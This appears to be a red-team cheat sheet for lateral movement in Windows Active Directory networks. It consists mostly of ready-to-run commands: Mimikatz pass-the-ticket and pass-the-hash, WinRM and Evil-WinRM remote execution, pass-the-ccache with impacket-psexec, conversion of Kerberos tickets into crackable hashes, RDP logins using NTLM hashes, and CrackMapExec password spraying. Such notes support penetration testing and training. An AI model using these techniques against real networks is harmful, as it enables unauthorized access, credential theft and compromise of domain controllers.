# Lateral Movement

There aren't many ways to move laterally on Windows. The main ones are:

* psexec
* RDP
* WinRM
* SSH (rarely available)

Pass-the-hash (PTH) works with most of them.

## Mimikatz Ticket PTT

```powershell
# Inject the Kerberos ticket into the current logon session, then open a
# remoting session that authenticates with it
Enable-PSRemoting
mimikatz.exe '"kerberos::ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP
```

## WinRM

```powershell
# Build a credential object and run a command on the DC over WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
```

Evil-WinRM does the same from Linux:

* <https://github.com/Hackplayers/evil-winrm>

```bash
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
```

## PTH with Mimikatz

```powershell
# Start a process whose logon session carries the supplied NTLM hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
```

## Pass The Ccache (PTC)

Copy the ccache file from the remote host and point `KRB5CCNAME` at it:

```bash
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
```

Make sure the clock is synced with the DC, otherwise Kerberos will reject the ticket:

```bash
sudo ntpdate -u 192.168.1.231
```

Psexec to the target using the ticket (`-k -no-pass`):

```bash
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
```

**Note:** don't include the domain name in the psexec target. If you are still having issues with the command, you may remove the username as well.

## Cracking Ccache

Convert the ccache file into a kirbi file using a converter.

* I use <https://github.com/zer1t0/ticket_converter>

```bash
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
```

Convert the kirbi file into a crackable hash.

* <https://github.com/nidem/kerberoast>
* <https://github.com/jarilaos/kirbi2hashcat/blob/master/kirbi2hashcat.py>

```bash
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
```

## RDP

Impacket's `rdp_check.py` is a quick way to test whether a credential is accepted over RDP.

```bash
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
```

Connect with a password or an NTLM hash:

```bash
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
```

## CrackMapExec

Swiss-army-knife tool, used here for password spraying across many hosts.

* <https://github.com/byt3bl33d3r/CrackMapExec>

```bash
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares
```

